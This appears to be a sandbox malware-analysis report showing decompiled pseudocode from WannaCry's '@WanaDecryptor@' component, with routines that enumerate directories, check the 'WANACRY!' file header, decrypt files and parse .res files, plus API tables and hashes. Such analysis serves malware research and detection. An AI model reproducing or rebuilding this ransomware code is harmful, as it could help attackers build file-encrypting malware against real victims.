				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}




































                                  0x004026b0
                                  0x004026b2
                                  0x004026bd
                                  0x004026be
                                  0x004026c5
                                  0x004026d3
                                  0x004026db
                                  0x004026e4
                                  0x004026e8
                                  0x004026f1
                                  0x004026fa
                                  0x00402706
                                  0x0040270a
                                  0x00402720
                                  0x00402728
                                  0x0040272e
                                  0x0040273e
                                  0x00402747
                                  0x0040274b
                                  0x004027c2
                                  0x004027c2
                                  0x004027ca
                                  0x00000000
                                  0x00000000
                                  0x004027e1
                                  0x004027e3
                                  0x004027e8
                                  0x004027fb
                                  0x004027fd
                                  0x00402802
                                  0x00402816
                                  0x00402822
                                  0x00402828
                                  0x00402838
                                  0x004028c3
                                  0x004028c5
                                  0x004028ca
                                  0x004028dd
                                  0x004028df
                                  0x004028e4
                                  0x004028f3
                                  0x004028f5
                                  0x004028fa
                                  0x00402905
                                  0x00402909
                                  0x00402914
                                  0x00402916
                                  0x00402923
                                  0x0040293c
                                  0x00402944
                                  0x00402949
                                  0x00402951
                                  0x00000000
                                  0x00402953
                                  0x004028fa
                                  0x004028e4
                                  0x0040283a
                                  0x00402850
                                  0x0040285f
                                  0x00402863
                                  0x0040286e
                                  0x00402870
                                  0x0040287d
                                  0x00402896
                                  0x0040289e
                                  0x004028a3
                                  0x004028ab
                                  0x00402957
                                  0x00402957
                                  0x00402957
                                  0x00402850
                                  0x00402838
                                  0x00402802
                                  0x00402972
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402972
                                  0x0040297d
                                  0x00402983
                                  0x00402987
                                  0x0040298b
                                  0x0040298d
                                  0x0040298d
                                  0x00402995
                                  0x00000000
                                  0x00000000
                                  0x0040299b
                                  0x004029a0
                                  0x004029a2
                                  0x004029a2
                                  0x004029aa
                                  0x004029af
                                  0x004029b7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004029b7
                                  0x0040298d
                                  0x004029b9
                                  0x004029b9
                                  0x004029bd
                                  0x004029c1
                                  0x004029c3
                                  0x004029c3
                                  0x004029cb
                                  0x00000000
                                  0x00000000
                                  0x004029d1
                                  0x004029d6
                                  0x004029d8
                                  0x004029d8
                                  0x004029e0
                                  0x004029e5
                                  0x004029ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004029ed
                                  0x004029c3
                                  0x004029ef
                                  0x004029ef
                                  0x00402a0c
                                  0x00402a0e
                                  0x00402a16
                                  0x00402a2c
                                  0x00402a2e
                                  0x00402a36
                                  0x00402a3c
                                  0x00402a40
                                  0x00402a47
                                  0x00402a49
                                  0x00402a4d
                                  0x00402a4f
                                  0x00402a4f
                                  0x00402a51
                                  0x00402a5d
                                  0x00402a62
                                  0x00402a66
                                  0x00402a66
                                  0x00402a6a
                                  0x00402a6b
                                  0x00402a70
                                  0x00402a74
                                  0x00402a78
                                  0x00402a7c
                                  0x00402a7f
                                  0x00402a81
                                  0x00402a8e
                                  0x00402a92
                                  0x00402a94
                                  0x00402a98
                                  0x00402aaf
                                  0x00402ab4
                                  0x00402a94
                                  0x00402abe
                                  0x00402abf
                                  0x00402ac4
                                  0x00402ac7
                                  0x0040274d
                                  0x00402751
                                  0x00402765
                                  0x0040276e
                                  0x0040276f
                                  0x00402778
                                  0x0040277b
                                  0x0040277f
                                  0x00402790
                                  0x0040279b
                                  0x004027a4
                                  0x004027a5
                                  0x004027aa
                                  0x004027ad
                                  0x004027ad
                                  0x00402ad7
                                  0x00402ae4

                                  APIs
                                    • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  • swprintf.MSVCRT ref: 00402728
                                  • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                  • #825.MFC42(?,?,?,?), ref: 0040276F
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?), ref: 004027A5
                                  • wcscmp.MSVCRT ref: 004027E1
                                  • wcscmp.MSVCRT ref: 004027FB
                                  • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                  • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                  • wcslen.MSVCRT ref: 0040286E
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                  • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                  • FindClose.KERNEL32(?), ref: 0040297D
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                  • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                  • API String ID: 1037557366-268640142
                                  • Opcode ID: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                  • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                  • Opcode Fuzzy Hash: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                  • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359filetimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}




















































                                  0x004020a3
                                  0x004020a5
                                  0x004020aa
                                  0x004020b5
                                  0x004020b6
                                  0x004020c5
                                  0x004020c6
                                  0x004020cc
                                  0x004020cf
                                  0x004020d5
                                  0x004020dd
                                  0x004020e0
                                  0x004020e6
                                  0x004020ef
                                  0x004020f5
                                  0x004020fc
                                  0x00402102
                                  0x00402108
                                  0x0040210b
                                  0x0040210e
                                  0x00402114
                                  0x0040212d
                                  0x0040212f
                                  0x00402137
                                  0x00402159
                                  0x0040216e
                                  0x00402174
                                  0x00402176
                                  0x0040244c
                                  0x0040244c
                                  0x00402451
                                  0x00000000
                                  0x0040217c
                                  0x0040218c
                                  0x0040218e
                                  0x00402190
                                  0x00000000
                                  0x00402196
                                  0x004021a5
                                  0x004021ab
                                  0x004021ad
                                  0x00000000
                                  0x004021b3
                                  0x004021b3
                                  0x004021bd
                                  0x00000000
                                  0x004021c3
                                  0x004021ce
                                  0x004021dc
                                  0x004021e2
                                  0x004021e4
                                  0x00000000
                                  0x004021ea
                                  0x004021fa
                                  0x00402200
                                  0x00402202
                                  0x00000000
                                  0x00402208
                                  0x00402218
                                  0x0040221e
                                  0x00402220
                                  0x00000000
                                  0x00402226
                                  0x00402226
                                  0x0040222d
                                  0x0040230f
                                  0x00402315
                                  0x00402317
                                  0x0040231d
                                  0x00402320
                                  0x0040232f
                                  0x00402336
                                  0x00402345
                                  0x00402348
                                  0x0040234d
                                  0x0040234f
                                  0x0040238b
                                  0x0040238b
                                  0x0040238e
                                  0x00402393
                                  0x00402394
                                  0x0040239a
                                  0x004023a1
                                  0x004023a2
                                  0x004023ad
                                  0x004023b6
                                  0x004023b9
                                  0x004023bc
                                  0x004023be
                                  0x00000000
                                  0x00000000
                                  0x004023c4
                                  0x004023d1
                                  0x004023d1
                                  0x004023d7
                                  0x004023d9
                                  0x004023e0
                                  0x004023f3
                                  0x004023f9
                                  0x004023fb
                                  0x0040246f
                                  0x0040246f
                                  0x00402474
                                  0x00000000
                                  0x004023fd
                                  0x004023fd
                                  0x00402400
                                  0x00402402
                                  0x00000000
                                  0x00402404
                                  0x00402404
                                  0x00402407
                                  0x0040241c
                                  0x0040241f
                                  0x00402436
                                  0x0040243c
                                  0x0040243e
                                  0x00000000
                                  0x00402440
                                  0x00402443
                                  0x00402446
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402446
                                  0x0040243e
                                  0x00402402
                                  0x004023db
                                  0x004023db
                                  0x004023de
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004023de
                                  0x004023c6
                                  0x004023c9
                                  0x004023cb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004023cb
                                  0x00000000
                                  0x004023c4
                                  0x00402477
                                  0x0040248a
                                  0x00402491
                                  0x00000000
                                  0x00402351
                                  0x00402354
                                  0x0040235b
                                  0x0040236a
                                  0x0040236d
                                  0x00402372
                                  0x00402374
                                  0x00402381
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402374
                                  0x00402322
                                  0x00402322
                                  0x00402326
                                  0x00000000
                                  0x00402326
                                  0x00402233
                                  0x00402234
                                  0x00402253
                                  0x00402255
                                  0x0040225b
                                  0x0040225e
                                  0x00000000
                                  0x00402264
                                  0x00402274
                                  0x00402289
                                  0x0040228f
                                  0x00402291
                                  0x00000000
                                  0x00402297
                                  0x00402297
                                  0x0040229e
                                  0x00000000
                                  0x004022a4
                                  0x004022ab
                                  0x004022c0
                                  0x004022c6
                                  0x004022c8
                                  0x00402376
                                  0x00402376
                                  0x0040237b
                                  0x00000000
                                  0x004022ce
                                  0x004022ce
                                  0x004022d5
                                  0x00000000
                                  0x004022db
                                  0x004022e5
                                  0x004022e8
                                  0x004022ee
                                  0x00402497
                                  0x004024ad
                                  0x004024b3
                                  0x004024ba
                                  0x004024c3
                                  0x004024c3
                                  0x004024c6
                                  0x004024cc
                                  0x004024da
                                  0x004024da
                                  0x004024e0
                                  0x004024e6
                                  0x004024e8
                                  0x00402509
                                  0x00402509
                                  0x0040250b
                                  0x00402510
                                  0x00402511
                                  0x00402521
                                  0x0040252e
                                  0x0040252e
                                  0x004022d5
                                  0x004022c8
                                  0x0040229e
                                  0x00402291
                                  0x0040225e
                                  0x0040222d
                                  0x00402220
                                  0x00402202
                                  0x004021e4
                                  0x004021bd
                                  0x004021ad
                                  0x00402190
                                  0x00402139
                                  0x00402139
                                  0x0040213d
                                  0x00402452
                                  0x00402452
                                  0x0040245f
                                  0x0040246c
                                  0x0040246c
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                  • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                  • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                  • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                  • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                  • CloseHandle.KERNEL32(00000000), ref: 00402234
                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                  • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                  • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                  • _local_unwind2.MSVCRT ref: 00402452
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                  • String ID: WANACRY!
                                  • API String ID: 1586634678-1240840912
                                  • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                  • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
